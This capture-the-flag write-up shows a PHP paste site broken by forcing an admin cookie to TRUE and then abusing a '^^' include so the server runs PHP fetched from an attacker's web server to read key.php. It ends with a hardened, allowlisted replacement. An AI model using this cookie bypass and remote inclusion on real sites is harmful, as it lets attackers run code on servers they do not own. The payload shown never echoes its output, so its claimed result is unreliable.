For this challenge we get the PHP source to a web page. In cookies.php, we see:
if (!isset($_COOKIE[PASTE_ADMIN])) setcookie(PASTE_ADMIN, 'FALSE', time() + 60 * 60 * 24 * 2);
Looks suspicious. We will probably want to set the cookie PASTE_ADMIN to TRUE. Look elsewhere for what admin gets us, in make_followup.php:
    if (!(isset($_COOKIE[PASTE_ADMIN]) && $_COOKIE[PASTE_ADMIN] == 'TRUE')) {
        $admin = true;
        foreach ($_COOKIE as $name => $value) {
            if ($value == 'TRUE' && $name != PASTE_ADMIN) {
                $admin = false;
                break;
            }
        }
        while (!$admin && strlen($description) > 0 && strcmp(substr($description, 0, 2), "^^") == 0) {
            $description = substr($description, 2);
        }
    }
So only the PASTE_ADMIN cookie may be set to TRUE (setting any other cookie to TRUE disqualifies you), and if you aren't admin every leading "^^" is stripped from the description. In display_paste.php:
if (strcmp(substr($description, 0, 2), "^^") == 0) { require(substr($description, 2) . ".txt"); }
So, if you are admin, you can make a post whose description starts with "^^", and displaying the post will require() an arbitrary file (with ".txt" appended) as PHP. First, look at the cookies in the browser. All of the cookie names are hex strings, so we don't know which one is PASTE_ADMIN. Since only one of them may be TRUE, we just tried each one until we got admin. The first one turned out to be correct. Submitting "^^test" caused a blank page (a PHP error from the failed include).
Now, we need to grab the key off the server. Place the following file anywhere on a web server (watching out for the ".txt" appended to the URL by the challenge site):
PHP Payload: <? file_get_contents("key.php"); ?>
Make a post with "^^" followed by the URL (minus the .txt), and this gives the key when the post is displayed:
s0m3_php_d3v5_actua11y_d0_th15
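For contrast, here is a hardened replacement for the include in display_paste.php. This is an added example, not the challenge's code; it assumes the included files are templates living in a fixed directory (TEMPLATE_DIR) and that $description is the paste description as in the original.

```php
<?php
// Added example (not the challenge's code): a hardened version of the
// "^^" include from display_paste.php. Assumes templates live in a fixed
// directory and a paste may only name a file from that directory.
const TEMPLATE_DIR = __DIR__ . '/templates';

function resolve_template(string $description): ?string
{
    // Only a description starting with the "^^" marker refers to a template.
    // Strict comparison (!==) instead of strcmp()/== avoids type juggling.
    if (substr($description, 0, 2) !== '^^') {
        return null;
    }
    $name = substr($description, 2);

    // Allowlist: a template name is a short identifier, never a path or URL,
    // so "^^../x", "^^/etc/x" and "^^http://host/x" are all rejected here.
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $name)) {
        return null;
    }

    // Resolve the final path and confirm it is still inside TEMPLATE_DIR
    // (catches symlinks and anything the regex might have missed).
    $path = realpath(TEMPLATE_DIR . '/' . $name . '.txt');
    $base = realpath(TEMPLATE_DIR);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Usage in display_paste.php: a null result means "not a template", so
// nothing is included and the description is shown as plain text instead.
$description = $description ?? '';
$template = resolve_template($description);
if ($template !== null) {
    require $template;
} else {
    echo htmlspecialchars($description, ENT_QUOTES, 'UTF-8');
}
```

Pair this with allow_url_include=Off (and ideally allow_url_fopen=Off) in php.ini so that a remote URL can never reach require() even if a future code path forgets the allowlist.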